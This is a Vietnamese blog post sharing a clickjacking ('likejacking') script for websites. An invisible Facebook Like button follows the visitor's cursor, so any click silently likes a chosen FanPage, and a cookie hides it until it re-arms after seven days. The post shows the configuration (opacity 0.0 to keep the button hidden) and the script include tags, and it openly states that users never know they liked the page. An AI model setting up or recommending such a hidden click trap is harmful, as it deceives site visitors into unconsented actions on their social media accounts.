Share code Auto Like FaceBook cho anh em Webmaster Việt Nam

Như đã hứa trong một topic trước đây (Code auto like page facebook). Nay mình share code Auto Like FanPage (Share code Auto Like FaceBook cho anh em Webmaster Việt Nam) mới mà mình code cách đây vài tháng và sử dụng khá hiệu quả. Code này tương đối dễ sử dụng và không gây khó chịu cho người dùng.

Nói một cách đơn giản, code này tạo ra một nút Like chạy theo chuột khi người dùng duyệt website của bạn. Nếu người dùng click vào bất kì vị trí nào, do nút Like chạy theo chuột nên cũng là click lên nút Like. Sau đó nút Like sẽ được ẩn đi để người dùng duyệt web bình thường mà không hề hay biết họ đã Like một FanPage nào đó. Lúc này, cookie được sử dụng để lưu lại hành động của người dùng và sẽ dấu nút Like khi người dùng duyệt những trang tiếp theo nên sẽ không xuất hiện nút Like lần thứ hai.

Sau 7 ngày (mặc định của mình) nút Like sẽ được phép kích hoạt lên lại để một lần nữa bắt người dùng Like nếu họ chưa Like ở lần trước (do chưa đăng nhập FB chẳng hạn). Một khi người dùng click chuột, dù đã like hay chưa like nút này cũng sẽ được ẩn đi để không gây khó khăn cho việc duyệt web của họ.

Ngoài ra mình bổ sung thêm 1 tính năng nữa trong code này đó là no sẽ tự động biến mất (nút Like) sau một khoản thời gian nếu người dùng không có hành động click chuột.

Cấu hình

Bạn mở file likeme.js và cấu hình các thông số sau:

Code:
var fan_page_url = 'https://www.facebook.com/webmastersvietnam'; //Like this FanPage to use my script. Thank !
var opacity = 0.0;
var time = 3000;
Trong đó:

  • fan_page_url: URL FanPage của bạn
  • opacity: nếu bạn muốn kiểm tra nút Like chạy theo chuột như thế nào thì set thành 1.0. Còn lại chúng ta để 0.0 để ẩn nút Like đi, người dùng sẽ không thấy nút Like (nhưng nó vẫn sẽ hoạt động khi người dùng click)
  • time: thời gian nút Like sẽ tự động biến mất nếu không thao tác. Nếu set về 0, nút Like sẽ không tự động mất.



Hướng dẫn cài đặt:

Bạn cần khai báo đoạn script sau là xong:

Code:
<script language="javascript" src="jquery.min.js"></script>
<script language="javascript" src="jquery.cookie.js"></script>
<script language="javascript" src="likeme.js"></script>
Mọi thắc mắc các bạn đăng ở topic này nhé 

No comments:

Post a Comment

Lên đầu trang